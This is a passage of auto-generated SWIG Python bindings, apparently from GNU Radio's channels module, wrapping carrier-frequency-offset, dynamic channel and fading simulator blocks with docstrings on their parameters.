_channels_swig.cfo_model_sptr_set_max_noutput_items(self, *args, **kwargs) def unset_max_noutput_items(self): """unset_max_noutput_items(cfo_model_sptr self)""" return _channels_swig.cfo_model_sptr_unset_max_noutput_items(self) def is_set_max_noutput_items(self): """is_set_max_noutput_items(cfo_model_sptr self) -> bool""" return _channels_swig.cfo_model_sptr_is_set_max_noutput_items(self) def set_min_noutput_items(self, *args, **kwargs): """set_min_noutput_items(cfo_model_sptr self, int m)""" return _channels_swig.cfo_model_sptr_set_min_noutput_items(self, *args, **kwargs) def min_noutput_items(self): """min_noutput_items(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_min_noutput_items(self) def max_output_buffer(self, *args, **kwargs): """max_output_buffer(cfo_model_sptr self, int i) -> long""" return _channels_swig.cfo_model_sptr_max_output_buffer(self, *args, **kwargs) def set_max_output_buffer(self, *args): """ set_max_output_buffer(cfo_model_sptr self, long max_output_buffer) set_max_output_buffer(cfo_model_sptr self, int port, long max_output_buffer) """ return _channels_swig.cfo_model_sptr_set_max_output_buffer(self, *args) def min_output_buffer(self, *args, **kwargs): """min_output_buffer(cfo_model_sptr self, int i) -> long""" return _channels_swig.cfo_model_sptr_min_output_buffer(self, *args, **kwargs) def set_min_output_buffer(self, *args): """ set_min_output_buffer(cfo_model_sptr self, long min_output_buffer) set_min_output_buffer(cfo_model_sptr self, int port, long min_output_buffer) """ return _channels_swig.cfo_model_sptr_set_min_output_buffer(self, *args) def pc_noutput_items(self): """pc_noutput_items(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_noutput_items(self) def pc_noutput_items_avg(self): """pc_noutput_items_avg(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_noutput_items_avg(self) def pc_noutput_items_var(self): """pc_noutput_items_var(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_noutput_items_var(self) def pc_nproduced(self): """pc_nproduced(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_nproduced(self) def pc_nproduced_avg(self): """pc_nproduced_avg(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_nproduced_avg(self) def pc_nproduced_var(self): """pc_nproduced_var(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_nproduced_var(self) def pc_input_buffers_full(self, *args): """ pc_input_buffers_full(cfo_model_sptr self, int which) -> float pc_input_buffers_full(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_input_buffers_full(self, *args) def pc_input_buffers_full_avg(self, *args): """ pc_input_buffers_full_avg(cfo_model_sptr self, int which) -> float pc_input_buffers_full_avg(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_input_buffers_full_avg(self, *args) def pc_input_buffers_full_var(self, *args): """ pc_input_buffers_full_var(cfo_model_sptr self, int which) -> float pc_input_buffers_full_var(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_input_buffers_full_var(self, *args) def pc_output_buffers_full(self, *args): """ pc_output_buffers_full(cfo_model_sptr self, int which) -> float pc_output_buffers_full(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_output_buffers_full(self, *args) def pc_output_buffers_full_avg(self, *args): """ 
pc_output_buffers_full_avg(cfo_model_sptr self, int which) -> float pc_output_buffers_full_avg(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_output_buffers_full_avg(self, *args) def pc_output_buffers_full_var(self, *args): """ pc_output_buffers_full_var(cfo_model_sptr self, int which) -> float pc_output_buffers_full_var(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_output_buffers_full_var(self, *args) def pc_work_time(self): """pc_work_time(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_work_time(self) def pc_work_time_avg(self): """pc_work_time_avg(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_work_time_avg(self) def pc_work_time_var(self): """pc_work_time_var(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_work_time_var(self) def pc_work_time_total(self): """pc_work_time_total(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_work_time_total(self) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(cfo_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.cfo_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(cfo_model_sptr self)""" return _channels_swig.cfo_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(cfo_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.cfo_model_sptr_processor_affinity(self) def active_thread_priority(self): """active_thread_priority(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_active_thread_priority(self) def thread_priority(self): """thread_priority(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_thread_priority(self) def set_thread_priority(self, *args, **kwargs): """set_thread_priority(cfo_model_sptr self, int priority) -> int""" return _channels_swig.cfo_model_sptr_set_thread_priority(self, *args, **kwargs) def name(self): """name(cfo_model_sptr self) -> std::string""" return _channels_swig.cfo_model_sptr_name(self) def symbol_name(self): """symbol_name(cfo_model_sptr self) -> std::string""" return _channels_swig.cfo_model_sptr_symbol_name(self) def input_signature(self): """input_signature(cfo_model_sptr self) -> io_signature_sptr""" return _channels_swig.cfo_model_sptr_input_signature(self) def output_signature(self): """output_signature(cfo_model_sptr self) -> io_signature_sptr""" return _channels_swig.cfo_model_sptr_output_signature(self) def unique_id(self): """unique_id(cfo_model_sptr self) -> long""" return _channels_swig.cfo_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(cfo_model_sptr self) -> basic_block_sptr""" return _channels_swig.cfo_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(cfo_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.cfo_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(cfo_model_sptr self) -> std::string""" return _channels_swig.cfo_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(cfo_model_sptr self, std::string name)""" return _channels_swig.cfo_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(cfo_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return 
_channels_swig.cfo_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(cfo_model_sptr self) -> swig_int_ptr""" return _channels_swig.cfo_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(cfo_model_sptr self) -> swig_int_ptr""" return _channels_swig.cfo_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(cfo_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.cfo_model_sptr_message_subscribers(self, *args, **kwargs) cfo_model_sptr_swigregister = _channels_swig.cfo_model_sptr_swigregister cfo_model_sptr_swigregister(cfo_model_sptr) cfo_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) cfo_model = cfo_model.make; class dynamic_channel_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::dynamic_channel_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::dynamic_channel_model)> self) -> dynamic_channel_model_sptr __init__(boost::shared_ptr<(gr::channels::dynamic_channel_model)> self, dynamic_channel_model p) -> dynamic_channel_model_sptr """ this = _channels_swig.new_dynamic_channel_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(dynamic_channel_model_sptr self) -> dynamic_channel_model""" return _channels_swig.dynamic_channel_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_dynamic_channel_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(dynamic_channel_model_sptr self, double samp_rate, double sro_std_dev, double sro_max_dev, double cfo_std_dev, double cfo_max_dev, unsigned int N, double doppler_freq, bool LOS_model, float K, pmt_vector_float delays, pmt_vector_float mags, int ntaps_mpath, double noise_amp, double noise_seed) -> dynamic_channel_model_sptr dynamic channel simulator This block implements a dynamic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set up an AWGN noise cource, a random walk process to simulate carrier frequency drift, a random walk process to simulate sample rate offset drive, and a frequency selective fading channel response that is either Rayleigh or Ricean for a user specified power delay profile. Constructor Specific Documentation: Build the dynamic channel simulator. Args: samp_rate : Input sample rate in Hz sro_std_dev : sample rate drift process standard deviation per sample in Hz sro_max_dev : maximum sample rate offset in Hz cfo_std_dev : carrier frequnecy drift process standard deviation per sample in Hz cfo_max_dev : maximum carrier frequency offset in Hz N : number of sinusoids used in frequency selective fading simulation doppler_freq : maximum doppler frequency used in fading simulation in Hz LOS_model : defines whether the fading model should include a line of site component. LOS->Rician, NLOS->Rayleigh K : Rician K-factor, the ratio of specular to diffuse power in the model delays : A list of fractional sample delays making up the power delay profile mags : A list of magnitudes corresponding to each delay time in the power delay profile ntaps_mpath : The length of the filter to interpolate the power delay profile over. 
Delays in the PDP must lie between 0 and ntaps_mpath, fractional delays will be sinc-interpolated only to the width of this filter. noise_amp : Specifies the standard deviation of the AWGN process noise_seed : A random number generator seed for the noise source. """ return _channels_swig.dynamic_channel_model_sptr_make(self, *args, **kwargs) def samp_rate(self): """samp_rate(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_samp_rate(self) def sro_dev_std(self): """sro_dev_std(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_sro_dev_std(self) def sro_dev_max(self): """sro_dev_max(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_sro_dev_max(self) def cfo_dev_std(self): """cfo_dev_std(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_cfo_dev_std(self) def cfo_dev_max(self): """cfo_dev_max(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_cfo_dev_max(self) def noise_amp(self): """noise_amp(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_noise_amp(self) def doppler_freq(self): """doppler_freq(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_doppler_freq(self) def K(self): """K(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_K(self) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_samp_rate(self, *args, **kwargs) def set_sro_dev_std(self, *args, **kwargs): """set_sro_dev_std(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_sro_dev_std(self, *args, **kwargs) def set_sro_dev_max(self, *args, **kwargs): """set_sro_dev_max(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_sro_dev_max(self, *args, **kwargs) def set_cfo_dev_std(self, *args, **kwargs): """set_cfo_dev_std(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_cfo_dev_std(self, *args, **kwargs) def set_cfo_dev_max(self, *args, **kwargs): """set_cfo_dev_max(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_cfo_dev_max(self, *args, **kwargs) def set_noise_amp(self, *args, **kwargs): """set_noise_amp(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_noise_amp(self, *args, **kwargs) def set_doppler_freq(self, *args, **kwargs): """set_doppler_freq(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_doppler_freq(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_K(self, *args, **kwargs) def primitive_connect(self, *args): """ primitive_connect(dynamic_channel_model_sptr self, basic_block_sptr block) primitive_connect(dynamic_channel_model_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.dynamic_channel_model_sptr_primitive_connect(self, *args) def primitive_msg_connect(self, *args): """ primitive_msg_connect(dynamic_channel_model_sptr self, basic_block_sptr src, swig_int_ptr srcport, 
basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_connect(dynamic_channel_model_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.dynamic_channel_model_sptr_primitive_msg_connect(self, *args) def primitive_msg_disconnect(self, *args): """ primitive_msg_disconnect(dynamic_channel_model_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_disconnect(dynamic_channel_model_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.dynamic_channel_model_sptr_primitive_msg_disconnect(self, *args) def primitive_disconnect(self, *args): """ primitive_disconnect(dynamic_channel_model_sptr self, basic_block_sptr block) primitive_disconnect(dynamic_channel_model_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.dynamic_channel_model_sptr_primitive_disconnect(self, *args) def disconnect_all(self): """disconnect_all(dynamic_channel_model_sptr self)""" return _channels_swig.dynamic_channel_model_sptr_disconnect_all(self) def lock(self): """lock(dynamic_channel_model_sptr self)""" return _channels_swig.dynamic_channel_model_sptr_lock(self) def unlock(self): """unlock(dynamic_channel_model_sptr self)""" return _channels_swig.dynamic_channel_model_sptr_unlock(self) def primitive_message_port_register_hier_in(self, *args, **kwargs): """primitive_message_port_register_hier_in(dynamic_channel_model_sptr self, swig_int_ptr port_id)""" return _channels_swig.dynamic_channel_model_sptr_primitive_message_port_register_hier_in(self, *args, **kwargs) def primitive_message_port_register_hier_out(self, *args, **kwargs): """primitive_message_port_register_hier_out(dynamic_channel_model_sptr self, swig_int_ptr port_id)""" return _channels_swig.dynamic_channel_model_sptr_primitive_message_port_register_hier_out(self, *args, **kwargs) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(dynamic_channel_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.dynamic_channel_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(dynamic_channel_model_sptr self)""" return _channels_swig.dynamic_channel_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(dynamic_channel_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.dynamic_channel_model_sptr_processor_affinity(self) def to_hier_block2(self): """to_hier_block2(dynamic_channel_model_sptr self) -> hier_block2_sptr""" return _channels_swig.dynamic_channel_model_sptr_to_hier_block2(self) def name(self): """name(dynamic_channel_model_sptr self) -> std::string""" return _channels_swig.dynamic_channel_model_sptr_name(self) def symbol_name(self): """symbol_name(dynamic_channel_model_sptr self) -> std::string""" return _channels_swig.dynamic_channel_model_sptr_symbol_name(self) def input_signature(self): """input_signature(dynamic_channel_model_sptr self) -> io_signature_sptr""" return _channels_swig.dynamic_channel_model_sptr_input_signature(self) def output_signature(self): """output_signature(dynamic_channel_model_sptr self) -> io_signature_sptr""" return _channels_swig.dynamic_channel_model_sptr_output_signature(self) def unique_id(self): """unique_id(dynamic_channel_model_sptr self) -> long""" return 
_channels_swig.dynamic_channel_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(dynamic_channel_model_sptr self) -> basic_block_sptr""" return _channels_swig.dynamic_channel_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(dynamic_channel_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.dynamic_channel_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(dynamic_channel_model_sptr self) -> std::string""" return _channels_swig.dynamic_channel_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(dynamic_channel_model_sptr self, std::string name)""" return _channels_swig.dynamic_channel_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(dynamic_channel_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.dynamic_channel_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(dynamic_channel_model_sptr self) -> swig_int_ptr""" return _channels_swig.dynamic_channel_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(dynamic_channel_model_sptr self) -> swig_int_ptr""" return _channels_swig.dynamic_channel_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(dynamic_channel_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.dynamic_channel_model_sptr_message_subscribers(self, *args, **kwargs) dynamic_channel_model_sptr_swigregister = _channels_swig.dynamic_channel_model_sptr_swigregister dynamic_channel_model_sptr_swigregister(dynamic_channel_model_sptr) dynamic_channel_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) dynamic_channel_model = dynamic_channel_model.make; class fading_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::fading_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::fading_model)> self) -> fading_model_sptr __init__(boost::shared_ptr<(gr::channels::fading_model)> self, fading_model p) -> fading_model_sptr """ this = _channels_swig.new_fading_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(fading_model_sptr self) -> fading_model""" return _channels_swig.fading_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_fading_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(fading_model_sptr self, unsigned int N, float fDTs=0.01, bool LOS=True, float K=4, int seed=0) -> fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? 
selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators """ return _channels_swig.fading_model_sptr_make(self, *args, **kwargs) def fDTs(self): """fDTs(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_fDTs(self) def K(self): """K(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_K(self) def step(self): """step(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_step(self) def set_fDTs(self, *args, **kwargs): """set_fDTs(fading_model_sptr self, float fDTs)""" return _channels_swig.fading_model_sptr_set_fDTs(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(fading_model_sptr self, float K)""" return _channels_swig.fading_model_sptr_set_K(self, *args, **kwargs) def set_step(self, *args, **kwargs): """set_step(fading_model_sptr self, float step)""" return _channels_swig.fading_model_sptr_set_step(self, *args, **kwargs) def history(self): """history(fading_model_sptr self) -> unsigned int""" return _channels_swig.fading_model_sptr_history(self) def declare_sample_delay(self, *args): """ declare_sample_delay(fading_model_sptr self, int which, int delay) declare_sample_delay(fading_model_sptr self, unsigned int delay) """ return _channels_swig.fading_model_sptr_declare_sample_delay(self, *args) def sample_delay(self, *args, **kwargs): """sample_delay(fading_model_sptr self, int which) -> unsigned int""" return _channels_swig.fading_model_sptr_sample_delay(self, *args, **kwargs) def output_multiple(self): """output_multiple(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_output_multiple(self) def relative_rate(self): """relative_rate(fading_model_sptr self) -> double""" return _channels_swig.fading_model_sptr_relative_rate(self) def start(self): """start(fading_model_sptr self) -> bool""" return _channels_swig.fading_model_sptr_start(self) def stop(self): """stop(fading_model_sptr self) -> bool""" return _channels_swig.fading_model_sptr_stop(self) def nitems_read(self, *args, **kwargs): """nitems_read(fading_model_sptr self, unsigned int which_input) -> uint64_t""" return _channels_swig.fading_model_sptr_nitems_read(self, *args, **kwargs) def nitems_written(self, *args, **kwargs): """nitems_written(fading_model_sptr self, unsigned int which_output) -> uint64_t""" return _channels_swig.fading_model_sptr_nitems_written(self, *args, **kwargs) def max_noutput_items(self): """max_noutput_items(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_max_noutput_items(self) def set_max_noutput_items(self, *args, **kwargs): """set_max_noutput_items(fading_model_sptr self, int m)""" return _channels_swig.fading_model_sptr_set_max_noutput_items(self, *args, **kwargs) def unset_max_noutput_items(self): """unset_max_noutput_items(fading_model_sptr self)""" return _channels_swig.fading_model_sptr_unset_max_noutput_items(self) def is_set_max_noutput_items(self): """is_set_max_noutput_items(fading_model_sptr self) -> bool""" return _channels_swig.fading_model_sptr_is_set_max_noutput_items(self) def set_min_noutput_items(self, *args, **kwargs): """set_min_noutput_items(fading_model_sptr self, int m)""" return _channels_swig.fading_model_sptr_set_min_noutput_items(self, *args, **kwargs) def min_noutput_items(self): """min_noutput_items(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_min_noutput_items(self) def max_output_buffer(self, 
*args, **kwargs): """max_output_buffer(fading_model_sptr self, int i) -> long""" return _channels_swig.fading_model_sptr_max_output_buffer(self, *args, **kwargs) def set_max_output_buffer(self, *args): """ set_max_output_buffer(fading_model_sptr self, long max_output_buffer) set_max_output_buffer(fading_model_sptr self, int port, long max_output_buffer) """ return _channels_swig.fading_model_sptr_set_max_output_buffer(self, *args) def min_output_buffer(self, *args, **kwargs): """min_output_buffer(fading_model_sptr self, int i) -> long""" return _channels_swig.fading_model_sptr_min_output_buffer(self, *args, **kwargs) def set_min_output_buffer(self, *args): """ set_min_output_buffer(fading_model_sptr self, long min_output_buffer) set_min_output_buffer(fading_model_sptr self, int port, long min_output_buffer) """ return _channels_swig.fading_model_sptr_set_min_output_buffer(self, *args) def pc_noutput_items(self): """pc_noutput_items(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_noutput_items(self) def pc_noutput_items_avg(self): """pc_noutput_items_avg(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_noutput_items_avg(self) def pc_noutput_items_var(self): """pc_noutput_items_var(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_noutput_items_var(self) def pc_nproduced(self): """pc_nproduced(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_nproduced(self) def pc_nproduced_avg(self): """pc_nproduced_avg(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_nproduced_avg(self) def pc_nproduced_var(self): """pc_nproduced_var(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_nproduced_var(self) def pc_input_buffers_full(self, *args): """ pc_input_buffers_full(fading_model_sptr self, int which) -> float pc_input_buffers_full(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_input_buffers_full(self, *args) def pc_input_buffers_full_avg(self, *args): """ pc_input_buffers_full_avg(fading_model_sptr self, int which) -> float pc_input_buffers_full_avg(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_input_buffers_full_avg(self, *args) def pc_input_buffers_full_var(self, *args): """ pc_input_buffers_full_var(fading_model_sptr self, int which) -> float pc_input_buffers_full_var(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_input_buffers_full_var(self, *args) def pc_output_buffers_full(self, *args): """ pc_output_buffers_full(fading_model_sptr self, int which) -> float pc_output_buffers_full(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_output_buffers_full(self, *args) def pc_output_buffers_full_avg(self, *args): """ pc_output_buffers_full_avg(fading_model_sptr self, int which) -> float pc_output_buffers_full_avg(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_output_buffers_full_avg(self, *args) def pc_output_buffers_full_var(self, *args): """ pc_output_buffers_full_var(fading_model_sptr self, int which) -> float pc_output_buffers_full_var(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_output_buffers_full_var(self, *args) def pc_work_time(self): """pc_work_time(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_work_time(self) def 
pc_work_time_avg(self): """pc_work_time_avg(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_work_time_avg(self) def pc_work_time_var(self): """pc_work_time_var(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_work_time_var(self) def pc_work_time_total(self): """pc_work_time_total(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_work_time_total(self) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(fading_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.fading_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(fading_model_sptr self)""" return _channels_swig.fading_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(fading_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.fading_model_sptr_processor_affinity(self) def active_thread_priority(self): """active_thread_priority(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_active_thread_priority(self) def thread_priority(self): """thread_priority(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_thread_priority(self) def set_thread_priority(self, *args, **kwargs): """set_thread_priority(fading_model_sptr self, int priority) -> int""" return _channels_swig.fading_model_sptr_set_thread_priority(self, *args, **kwargs) def name(self): """name(fading_model_sptr self) -> std::string""" return _channels_swig.fading_model_sptr_name(self) def symbol_name(self): """symbol_name(fading_model_sptr self) -> std::string""" return _channels_swig.fading_model_sptr_symbol_name(self) def input_signature(self): """input_signature(fading_model_sptr self) -> io_signature_sptr""" return _channels_swig.fading_model_sptr_input_signature(self) def output_signature(self): """output_signature(fading_model_sptr self) -> io_signature_sptr""" return _channels_swig.fading_model_sptr_output_signature(self) def unique_id(self): """unique_id(fading_model_sptr self) -> long""" return _channels_swig.fading_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(fading_model_sptr self) -> basic_block_sptr""" return _channels_swig.fading_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(fading_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.fading_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(fading_model_sptr self) -> std::string""" return _channels_swig.fading_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(fading_model_sptr self, std::string name)""" return _channels_swig.fading_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(fading_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.fading_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(fading_model_sptr self) -> swig_int_ptr""" return _channels_swig.fading_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(fading_model_sptr self) -> swig_int_ptr""" return _channels_swig.fading_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(fading_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return 
_channels_swig.fading_model_sptr_message_subscribers(self, *args, **kwargs) fading_model_sptr_swigregister = _channels_swig.fading_model_sptr_swigregister fading_model_sptr_swigregister(fading_model_sptr) fading_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) fading_model = fading_model.make; class selective_fading_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::selective_fading_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::selective_fading_model)> self) -> selective_fading_model_sptr __init__(boost::shared_ptr<(gr::channels::selective_fading_model)> self, selective_fading_model p) -> selective_fading_model_sptr """ this = _channels_swig.new_selective_fading_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(selective_fading_model_sptr self) -> selective_fading_model""" return _channels_swig.selective_fading_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_selective_fading_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(selective_fading_model_sptr self, unsigned int N, float fDTs, bool LOS, float K, int seed, pmt_vector_float delays, pmt_vector_float mags, int ntaps) -> selective_fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators delays : A vector of values the specify the time delay of each impulse mags : A vector of values that specifies the magnitude of each impulse ntaps : The number of filter taps. 
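Example (illustrative sketch; the delay/magnitude profile and other values are arbitrary and the gnuradio.channels namespace is assumed):

    from gnuradio import channels
    # Rayleigh (NLOS) frequency-selective fading with a simple three-tap power delay profile
    fad = channels.selective_fading_model(8, 0.002, False, 4.0, 0,
                                          [0.0, 0.5, 1.5], [1.0, 0.6, 0.3], 8)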
